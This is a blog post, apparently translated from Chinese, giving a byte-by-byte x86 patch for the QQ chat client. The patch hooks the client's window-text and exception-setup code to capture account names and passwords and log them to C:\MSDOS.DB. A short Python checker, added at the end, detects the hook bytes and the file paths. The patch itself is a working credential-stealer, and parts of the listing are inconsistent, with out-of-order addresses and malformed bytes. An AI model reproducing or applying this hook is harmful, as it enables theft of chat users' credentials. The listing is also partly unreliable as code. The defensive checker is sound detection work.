Source: 黑客X檔案
Write the string C:\MSDOS.DB at 4002D0
Write the bytes 0DH,0AH at 4002E0
Write the string C:\FLAGE.DB at 4002F0
Write the following code at 400300:
400300: 50                PUSH  EAX              ; save EAX on the stack
400301: 58                POP   EAX              ; pop it again; the stack slot still holds EAX's value
400302: 83C408            ADD   ESP,8            ; pop 2 dwords; the old stack contents are not overwritten yet
400305: A1FCF7A100        MOV   EAX,[A1F7FC]     ; load the value stored at A1F7FC into EAX
40030A: 36870424          XCHG  EAX,SS:[ESP]     ; swap EAX with the top of stack
40030E: 36874424FC        XCHG  EAX,SS:[ESP-4]   ; swap the old top of stack with the value at top-4
400313: 36874424F8        XCHG  EAX,SS:[ESP-8]   ; swap the value at top-4 with the value at top-8
400318: 83EC0C            SUB   ESP,C            ; move the stack top down 3 dwords
40031B: 36870424          XCHG  EAX,SS:[ESP]     ; swap the value from top-8 with the new top (old top-C); the effect is that [A1F7FC] ends up at old top+8, the value that was at old top+8 moves down one dword, and the top moves down 4, i.e. one dword is pushed
40031F: FF1528D66100      CALL  GETWINDOWTEXTA   ; get the window's title text
400325: 36870424          XCHG  EAX,SS:[ESP]     ; save EAX (the return value) at the top of stack and get back the value of DS:[A1F7FC]
400329: 9C                PUSHFD                 ; save the flags register
40032A: 3D00D98E01        CMP   EAX,18ED900      ; is EAX greater than 18ED900? greater means a password or account is about to be read and must be logged; less means none is being read and nothing needs logging
40032F: 0F8652000000      JNA   400387           ; nothing to log, jump
400335: 60                PUSHAD                 ; save the 16 general-purpose registers
400336: 6800000000        PUSH  0
40033B: 6802000000        PUSH  2
400340: 6801000000        PUSH  1
400345: 6800000000        PUSH  0
40034A: 6800000000        PUSH  0
40034F: 68000000C0        PUSH  C0000000
400354: 68F0024000        PUSH  4002F0
400359: FF15D0D26100      CALL  CREATEFILEA      ; call the create-file function; fails if the file already exists
40035F: 83F8FF            CMP   EAX,-1           ; EAX holds the return value: -1 means failure, anything else success (the file handle)
400362: 0F841E000000      JZ    400386           ; failure, jump
400368: 50                PUSH  EAX              ; save the file handle on the stack
400369: FF1538D36100      CALL  CLOSEHANDLE      ; call the close-handle function
40036F: 6884034000        PUSH  400384           ; push the return address
400374: FF35FCF7A100      PUSH  [A1F7FC]         ; push the address where the password is stored
40037A: FF3500F8A100      PUSH  [A1F800]         ; push the address where the account name is stored
400380: 6800044000        PUSH  400400           ; push the jump target (the routine that saves the username and password)
400385: C3                RET                    ; transfer control
400386: 61                POPAD                  ; restore the 16 general-purpose registers
400387: 9D                POPFD                  ; restore the flags register
400388: 58                POP   EAX              ; restore EAX
400389: 6800064000        PUSH  400600           ; push the jump target
40038E: C3                RET                    ; transfer control
Write the subroutine at 400400 (it appends the username and password to the end of C:\MSDOS.DB; its parameters are the addresses where the password and username are stored, and the password must be pushed onto the stack first):
400400: 6800000000        PUSH  0
400405: 6802000000        PUSH  2
40040A: 6804000000        PUSH  4
40040F: 6800000000        PUSH  0
400414: 6800000000        PUSH  0
400419: 68000000C0        PUSH  C0000000
40041E: 68D0024000        PUSH  4002D0
400423: FF15D0D26100      CALL  CREATEFILEA      ; create the file, or open it if it exists; EAX returns the file handle, -1 on failure
400429: 83F8FF            CMP   EAX,-1
40042C: 0F8477000000      JZ    4004A9           ; failure, jump
400432: 50                PUSH  EAX              ; save the file handle
400433: 6802000000        PUSH  2
400438: 6800000000        PUSH  0
40043D: 6800000000        PUSH  0
400442: 50                PUSH  EAX
400443: FF1584D36100      CALL  SETFILEPOINTER   ; move the file pointer to the end of the file
400449: 58                POP   EAX              ; restore the file handle
40044A: 59                POP   ECX              ; get the address of the username
40044B: 51                PUSH  ECX              ; save the username address
40044C: 8BD8              MOV   EBX,EAX          ; keep the handle in EBX
40044E: 51                PUSH  ECX              ; save the username address
40044F: FF151CD36100      CALL  LSTRLENA         ; string-length function; EAX returns the length
400455: 40                INC   EAX              ; add 1 to the length so one extra 0 byte (serving as a separator) is written, separating the username from the password
400456: 59                POP   ECX              ; get the username address
400457: 6800000000        PUSH  0
40045C: 681CF8A100        PUSH  A1F81C
400461: 50                PUSH  EAX
400462: 51                PUSH  ECX              ; username address
400463: 53                PUSH  EBX
400464: FF157CD36100      CALL  WRITEFILE        ; write the username to the file
40046A: 59                POP   ECX              ; get the address of the password
40046B: 51                PUSH  ECX              ; save the password address
40046C: 51                PUSH  ECX
40046D: FF151CD36100      CALL  LSTRLENA         ; get the password length
400473: 59                POP   ECX              ; get the password address
400474: 6800000000        PUSH  0
400479: 681CF8A100        PUSH  A1F81C
40047E: 50                PUSH  EAX
40047F: 51                PUSH  ECX
400480: 53                PUSH  EBX
400481: FF157CD36100      CALL  WRITEFILE        ; write the password to the file
400487: 6800000000        PUSH  0
40048C: 681CF8A100        PUSH  A1F81C
400491: 6802000000        PUSH  2
400496: 68E0024000        PUSH  4002E0
40049B: 53                PUSH  EBX
4004AC: FF1538D36100      CALL  WRITEFILE        ; write the CR/LF to the file
4004A2: 53                PUSH  EBX              ; save the file handle
4004A3: FF1538D36100      CALL  CLOSEHANDLE      ; close the file
4004A9: C3                RET                    ; return to the caller
Write the following code at 400500:
400500: 60                PUSHAD
400501: 68F0024000        PUSH  4002F0
400506: FF1520D36100      CALL  DELETEFILEA      ; delete the flag file
40050C: 61                POPAD
40050D: 68538F5800        PUSH  588F53           ; push the address of the point where the original QQ program was interrupted
400512: 64A100000000      MOV   EAX,FS:[0]       ; the instruction replaced in the original QQ program; following the "environment engineering" principle, the program's running environment must be left unchanged, so its registers, stack and instructions have to be restored; this restores the replaced instruction
400518: C3                RET                    ; return to the interrupted point in the original QQ program
Write the following code at 400600:
400600: 60                PUSHAD
400601: 6800000000        PUSH  0
400606: 6802000000        PUSH  2
40060B: 6801000000        PUSH  1
400610: 6800000000        PUSH  0
400615: 6800000000        PUSH  0
40061A: 68000000C0        PUSH  C0000000
40061F: 68F024000         PUSH  4002F0
400624: FF15D0D26100      CALL  CREATEFILEA      ; create the file, or open it if it already exists
40062A: 83F8FF            CMP   EAX,-1
40062D: 0F84FB000000      JZ    40072E           ; error, jump
400633: 50                PUSH  EAX              ; save the file handle
400634: 8BD8              MOV   EBX,EAX          ; keep the file handle in EBX
400636: 6800000000        PUSH  0
40063B: 681CF8A100        PUSH  A1F81C
400640: 6808000000        PUSH  8
400645: FF7510            PUSH  [ESP+10]
400648: 58                POP   EAX
400649: 83E804            SUB   EAX,4            ; get the address of the data to write
40064C: 59                PUSH  EAX              ; push it
40064D: 90                NOP
40064E: 90                NOP
40064F: 90                NOP
400650: 53                PUSH  EBX
400651: FF157CD36100      CALL  WRITEFILE        ; write the data to the file; only a Windows system call can be used here, because system calls run at privileged level and only they can access any memory (read, write, execute) without causing a fault; anything else would cause a memory access violation and hence an illegal-operation error
400657: 6800000000        PUSH  0
40065C: 6800000000        PUSH  0
400661: 6800000000        PUSH  0
400666: 53                PUSH  EBX
400667: FF1584D36100      CALL  SETFILEPOINTER   ; move the file pointer to the start of the file
40066D: 58                POP   EAX              ; get the file handle
40066E: 50                PUSH  EAX              ; save the file handle
40066F: 50                PUSH  EAX
400670: 50                PUSH  EAX              ; these two EAX slots are actually used to hold the data read from the file, so any other register would do instead of EAX; since we have no right to write other memory, only the stack can be used: every application may modify its own stack, so only the stack can hold temporary data without triggering an access violation
400671: 6800000000        PUSH  0
400676: 681CF8A100        PUSH  A1F81C
40067B: 6808000000        PUSH  8
400680: 54                PUSH  ESP
400681: 368B0424          MOV   EAX,[SS:ESP]
400685: 38C010            ADD   EAX,10           ; adjust the address the data is written to
400688: 36890424          MOV   [SS:ESP],EAX
40068C: 53                PUSH  EBX
40068D: FF15D8D26100      CALL  READFILE         ; read the data onto the stack
400693: 90                NOP                    ; no-op; my edits to the code left a gap here, so it is padded with NOPs to keep the code contiguous
400694: 90                NOP
400695: 90                NOP
400696: 90                NOP
......
4006B5: 90                NOP
4006B6: FF1538D36100      CALL  CLOSEHANDLE      ; close the flag file
4006BC: 68F0024000        PUSH  4002F0
4006C1: FF1520D36100      CALL  DELETEFILEA      ; delete the flag file
4006C7: 58                POP   EAX              ; get the password address
4006C8: 5B                POP   EBX              ; get the username address
4006C9: 50                PUSH  EAX              ; save the password address
4006CA: 53                PUSH  EBX              ; save the username address
4006CB: 53                PUSH  EBX              ; save the username address
4006CC: 50                PUSH  EAX              ; save the password address
4006CD: FF151CD36100      CALL  LSTRLENA         ; get the password length
4006D3: 83F800            CMP   EAX,0            ; is the password length 0?
4006D6: 740D              JZ    4006E5           ; yes, jump
4006D8: FF151CD36100      CALL  LSTRLENA         ; get the username length
4006DE: 83F800            CMP   EAX,0            ; is the username length 0?
4006E1: 7507              JNZ   4006EA           ; not 0: jump to the code that saves the username and password
4006E3: 7401              JZ    4006E6           ; 0: jump to the end of the routine
4006E5: 5B                POP   EBX              ; the stack holds 3 dwords, so 3 pops are needed
4006E6: 58                POP   EAX
4006E7: 58                POP   EAX
4006E8: EB44              JMP   40072E           ; jump to the end of the routine
4006EA: 58                POP   EAX              ; get the username address
4006EB: 5B                POP   EBX              ; get the password address
4006EC: 68F9064000        PUSH  4006F9           ; push the return address
4006F1: 53                PUSH  EBX              ; push the password address
4006F2: 50                PUSH  EAX              ; push the username address
4006F3: 6800044000        PUSH  400400           ; push the jump target (the routine that saves the username and password)
4006F8: C3                RET                    ; transfer control
4006F9: 6800000000        PUSH  0
4006FE: 6802000000        PUSH  2
400703: 6801000000        PUSH  1
400708: 6800000000        PUSH  0
40070D: 6800000000        PUSH  0
400712: 68000000C0        PUSH  C0000000
400717: 68F0024000        PUSH  4002F0
40071C: FF15D0D26100      CALL  CREATEFILEA      ; create the flag file
400722: 83F8FF            CMP   EAX,-1
400725: 7407              JZ    40072E
400727: 50                PUSH  EAX
400728: FF1538D36100      CALL  CLOSEHANDLE      ; close the flag file
40072E: 61                POPAD                  ; restore the 16 general-purpose registers
40072F: 68E2B15C00        PUSH  5CB1E2           ; push the address of the point where the original QQ program was interrupted
400734: C3                RET                    ; return to the interrupted point in the original QQ program
Write the following code at 5CB1DC:
5CB1DC: 6800034000        PUSH  400300
5CB1E1: C3                RET
The original code there was FF1528D66100, i.e. CALL GETWINDOWTEXTA
Write the following code at 588F4D:
588F4D: 6800054000        PUSH  400500
588F52: C3                RET
The original code there was 64A100000000, i.e. MOV EAX,FS:[0]
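As an added example (not part of the original post), here is a Python check that a defender could run over a file image or memory dump of the patched program. It uses only facts the post gives: the two hook sites (5CB1DC and 588F4D), the original instruction bytes that were overwritten there, and the two file paths the patch writes and deletes. It compares each site with its documented original bytes, recognises the PUSH imm32 / RET (68 xx xx xx xx C3) trampoline that the patch drops in, reports where that trampoline diverts execution, and looks for the two path strings. The flat image layout, the base address and the constructed sample images are assumptions for this example, not something taken from the post or from QQ.

```python
import struct

# Constants taken from the post: the two hook sites in the QQ binary and the original bytes
# the patch overwrote, plus the two file paths the patched code writes and deletes.
ORIGINAL_BYTES = {
    0x5CB1DC: bytes.fromhex("FF1528D66100"),  # CALL [GetWindowTextA] (original code at 5CB1DC)
    0x588F4D: bytes.fromhex("64A100000000"),  # MOV EAX,FS:[0]       (original code at 588F4D)
}
IOC_STRINGS = [b"C:\\MSDOS.DB", b"C:\\FLAGE.DB"]

# Assumed layout for the constructed sample image (not from the post): one flat buffer whose
# first byte corresponds to virtual address BASE.
BASE = 0x588F00
IMAGE_SIZE = 0x5CB200 - BASE


def trampoline_target(chunk: bytes):
    """Return the imm32 of a 'PUSH imm32; RET' (68 xx xx xx xx C3) trampoline, or None."""
    if len(chunk) >= 6 and chunk[0] == 0x68 and chunk[5] == 0xC3:
        return struct.unpack("<I", chunk[1:5])[0]
    return None


def check_hook_sites(image: bytes, base: int, expected=ORIGINAL_BYTES):
    """Compare each documented site with its original instruction bytes.

    Returns one finding per site that does not match, recording what was found and,
    if the bytes form a PUSH/RET trampoline, the address it diverts execution to.
    """
    findings = []
    for va, orig in expected.items():
        off = va - base
        if off < 0 or off + len(orig) > len(image):
            continue  # site not covered by this image
        got = bytes(image[off:off + len(orig)])
        if got == orig:
            continue
        findings.append({
            "va": va,
            "expected": orig.hex(),
            "found": got.hex(),
            "push_ret_target": trampoline_target(got),
        })
    return findings


def find_ioc_strings(image: bytes, iocs=IOC_STRINGS):
    """Return the post's file-path strings that occur anywhere in the image."""
    return [s.decode() for s in iocs if s in bytes(image)]


def build_sample(patched: bool) -> bytes:
    """Constructed test image: either pristine, or carrying the post's two trampolines and strings."""
    img = bytearray(IMAGE_SIZE)
    for va, orig in ORIGINAL_BYTES.items():
        img[va - BASE:va - BASE + len(orig)] = orig
    if patched:
        # Bytes exactly as listed in the post: PUSH 400300 / RET and PUSH 400500 / RET
        img[0x5CB1DC - BASE:0x5CB1DC - BASE + 6] = bytes.fromhex("6800034000C3")
        img[0x588F4D - BASE:0x588F4D - BASE + 6] = bytes.fromhex("6800054000C3")
        # The patch's string constants, placed at an arbitrary offset in this sample
        blob = b"\x00".join(IOC_STRINGS)
        img[0x1000:0x1000 + len(blob)] = blob
    return bytes(img)


if __name__ == "__main__":
    for label in ("clean", "patched"):
        image = build_sample(label == "patched")
        print(label, check_hook_sites(image, BASE), find_ioc_strings(image))
```

On the clean sample the check returns no findings and no strings; on the patched sample it reports both sites with the trampoline targets 400300 and 400500, and both file paths. The same byte comparison works against any version whose original bytes are known, which is the useful general point: an inline PUSH/RET hook is a fixed six-byte signature at a known address, so verifying those addresses against a pristine copy is a cheap integrity check.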
posted on 2007-02-21 12:35 by 小尋
Categories: Embedded Development, Computer Viruses and Anti-virus